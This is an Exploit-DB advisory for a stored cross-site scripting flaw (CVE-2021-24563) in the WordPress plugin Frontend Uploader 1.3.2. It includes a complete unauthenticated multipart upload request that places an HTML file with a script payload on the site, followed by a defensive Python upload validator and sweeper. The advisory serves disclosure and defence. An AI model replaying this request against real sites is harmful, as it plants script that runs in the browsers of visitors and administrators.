WordPress Plugin Frontend Uploader 1.3.2 – Stored Cross Site Scripting (XSS) (Unauthenticated)

  • Author: Veshraj Ghimire
    Date: 2022-01-12
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50655/
  • # Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
    # Date: 10/01/2022
    # Exploit Author: Veshraj Ghimire
    # Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/
    # Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/
    # Version: 1.3.2
    # Tested on: Windows 10 - Chrome, WordPress 5.8.2
    # CVE: CVE-2021-24563
    
    # References:
    
    https://www.youtube.com/watch?v=lfrLoHl4-Zs
    https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1
    
    # Description:
    
    The plugin does not prevent HTML files from being uploaded via its form, allowing an unauthenticated user to upload a malicious HTML file (for example one containing JavaScript), which is executed when someone accesses the uploaded file directly.
    
    
    # Proof Of Concept:
    
    
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654
    Content-Length: 1396
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    -----------------------------124662954015823207281179831654
    Content-Disposition: form-data; name="post_ID"
    
    1247
    -----------------------------124662954015823207281179831654
    Content-Disposition: form-data; name="post_title"
    
    test
    -----------------------------124662954015823207281179831654
    Content-Disposition: form-data; name="post_content"
    
    test
    -----------------------------124662954015823207281179831654
    Content-Disposition: form-data; name="files[]"; filename="xss.html"
    Content-Type: text/html
    
    <script>alert(/XSS/)</script>
    -----------------------------124662954015823207281179831654
    Content-Disposition: form-data; name="action"
    
    upload_ugc
    -----------------------------124662954015823207281179831654
    Content-Disposition: form-data; name="form_layout"
    
    image
    -----------------------------124662954015823207281179831654
    Content-Disposition: form-data; name="fu_nonce"
    
    021fb612f9
    -----------------------------124662954015823207281179831654
    Content-Disposition: form-data; name="_wp_http_referer"
    
    /wordpress/frontend-uploader-form/
    -----------------------------124662954015823207281179831654
    Content-Disposition: form-data; name="ff"
    
    92b6cbfa6120e13ff1654e28cef2a271
    -----------------------------124662954015823207281179831654
    Content-Disposition: form-data; name="form_post_id"
    
    1247
    -----------------------------124662954015823207281179831654--
    
    
    
    Then access the uploaded file to trigger the XSS, e.g. https://example.com/wp-content/uploads/2021/07/xss.html
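    The root cause above is that the image form accepts a file purely on the basis of what the client sends. As an added defender's example (not code from the advisory or from the Frontend Uploader plugin), the following Python check enforces an extension allow-list, verifies the declared Content-Type and the file's magic bytes, and rejects bodies that contain markup a browser would execute if the file were opened directly. The same check can be run over an existing uploads tree to find files that slipped through. Function names, the marker list and the magic-byte table are assumptions of this example.

```python
import os
import re
from typing import Iterator, Optional, Tuple

# Extension -> (expected MIME type, leading magic bytes) for an image-only form.
IMAGE_SIGNATURES = {
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
    "gif":  ("image/gif",  b"GIF8"),
}

# Tags that make a file behave as a document when a browser opens it directly.
HTML_MARKERS = re.compile(rb"<\s*(?:!doctype\s+html|html|script|svg|iframe|body)\b", re.I)


def check_upload(filename: str, declared_type: Optional[str], head: bytes) -> Optional[str]:
    """Return None if the file may be stored, otherwise the reason it is rejected.

    `head` is the first few kilobytes of the body; `declared_type` is the
    Content-Type sent in the multipart part, or None when sweeping stored files.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in IMAGE_SIGNATURES:
        return f"extension {ext!r} is not in the allow-list"
    expected_type, magic = IMAGE_SIGNATURES[ext]
    if declared_type is not None:
        if declared_type.split(";")[0].strip().lower() != expected_type:
            return f"declared Content-Type {declared_type!r} does not match {expected_type}"
    if not head.startswith(magic):
        return "content does not start with the magic bytes for its extension"
    # A valid image header followed by markup is a polyglot; reject it too.
    if HTML_MARKERS.search(head):
        return "active markup embedded in file body"
    return None


def sweep_uploads(root: str, head_size: int = 4096) -> Iterator[Tuple[str, str]]:
    """Yield (path, reason) for each file under `root` (e.g. wp-content/uploads)
    that check_upload would reject; declared type is unknown, so only the
    extension, magic bytes and body markers are checked."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(head_size)
            reason = check_upload(name, None, head)
            if reason is not None:
                yield path, reason
```

The PoC part above (`xss.html`, `text/html`, a script body) fails the very first check; a renamed HTML file fails on magic bytes, and an image header with markup appended fails on the marker scan.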